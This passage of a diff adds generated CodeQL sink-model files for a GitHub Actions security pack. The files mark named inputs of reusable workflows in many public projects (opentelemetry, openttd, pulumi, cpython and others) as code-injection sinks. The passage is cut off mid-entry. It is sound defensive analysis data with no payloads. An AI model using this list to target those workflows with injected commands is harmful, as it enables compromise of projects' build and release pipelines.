+ - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "inputs.success", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "inputs.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml new file mode 100644 index 000000000000..eade5ecdae1d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "inputs.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml new file mode 100644 index 000000000000..1478244cc9ca --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "inputs.language", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.org", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml new file mode 100644 index 000000000000..8bb0915294cd --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] + - ["openbao/openbao/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml new file mode 100644 index 000000000000..cba6c4fbe5a5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_name", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.doc_base_file", "code-injection", "generated"] + - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "inputs.base_folder", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml new file mode 100644 index 000000000000..448d48f661db --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.release_platform", "code-injection", "generated"] + - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "inputs.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml new file mode 100644 index 000000000000..50eb3b1af36a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.package-name", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.product-version", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goarch", "code-injection", "generated"] + - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml new file mode 100644 index 000000000000..780fa92d20cc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "inputs.trigger_type", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/upload-cdn.yml", "*", "inputs.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-macos.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-linux.yml", "*", "inputs.survey_key", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/release-docs.yml", "*", "inputs.version", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-windows.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.full_arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-macos.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.extra-cmake-parameters", "code-injection", "generated"] + - ["openttd/openttd/.github/workflows/ci-linux.yml", "*", "inputs.libraries", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml new file mode 100644 index 000000000000..275d46772a2d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "inputs.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml new file mode 100644 index 000000000000..271c80c575e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_test_tensorflow_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_cpu.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_vulkan.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_regression_test_amdgpu_rocm.yml", "*", "inputs.artifact_run_id", "code-injection", "generated"] + - ["openxla/iree/.github/workflows/pkgci_build_packages.yml", "*", "inputs.package_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml new file mode 100644 index 000000000000..0f4ad0a7ca70 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml new file mode 100644 index 000000000000..c38ae9258600 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.http-client", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.kube-version", "code-injection", "generated"] + - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "inputs.java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml new file mode 100644 index 000000000000..fd4697ac1c43 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "inputs.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml new file mode 100644 index 000000000000..90c4c20b5857 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "inputs.release-version", "code-injection", "generated"] + - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml new file mode 100644 index 000000000000..51d99171a541 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "inputs.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml new file mode 100644 index 000000000000..8e74c9b811d4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "inputs.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml new file mode 100644 index 000000000000..cd7de6d57866 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.configuration", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.cmakeFlags", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml new file mode 100644 index 000000000000..ecea4012c75c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.pytest_test_directory", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.job_name", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "inputs.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 000000000000..f8ee5402a92f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "inputs.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml new file mode 100644 index 000000000000..aa76014db324 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.tags", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.suites", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "inputs.image-base-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml new file mode 100644 index 000000000000..e52ce3c8318f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml new file mode 100644 index 000000000000..31f24a27268a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.os", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.product", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.is_release", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml new file mode 100644 index 000000000000..4ace66c79c31 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.benchmark", "code-injection", "generated"] + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml new file mode 100644 index 000000000000..44518d6a348f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml new file mode 100644 index 000000000000..c0edbfae484c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "inputs.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml new file mode 100644 index 000000000000..a28ffce30f73 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.ent-public-key", "code-injection", "generated"] + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml new file mode 100644 index 000000000000..afe2daa172ee --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["prql/prql/.github/workflows/test-rust.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml new file mode 100644 index 000000000000..a07044c0ccc3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-command", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-name", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "inputs.version", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml new file mode 100644 index 000000000000..250307e3acdb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "inputs.ignore_dependency_check", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "inputs.debug", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "inputs.flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml new file mode 100644 index 000000000000..e968f2097065 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "inputs.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml new file mode 100644 index 000000000000..438f637a9a09 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pyo3/pyo3/.github/workflows/build.yml", "*", "inputs.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml new file mode 100644 index 000000000000..7e7b82b25f52 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "inputs.options", "code-injection", "generated"] + - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml new file mode 100644 index 000000000000..e3c3b19e4413 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml new file mode 100644 index 000000000000..704adb3f121b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["pytorch/xla/.github/workflows/_test.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml new file mode 100644 index 000000000000..5300a7d145e1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "inputs.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml new file mode 100644 index 000000000000..f82254bd22b6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.registry_target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml new file mode 100644 index 000000000000..80a26a9e65fb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "inputs.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml new file mode 100644 index 000000000000..eb5e7835565f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml new file mode 100644 index 000000000000..cd2629f49bcf --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["remix-run/remix/.github/workflows/stacks.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml new file mode 100644 index 000000000000..77ad5d6a6d35 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "inputs.version_override", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.architecture", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.OS", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.version_override", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml new file mode 100644 index 000000000000..a881a1a5fd3e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "inputs.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml new file mode 100644 index 000000000000..693d3abc03e1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "inputs.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml new file mode 100644 index 000000000000..119cbe465e6a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - 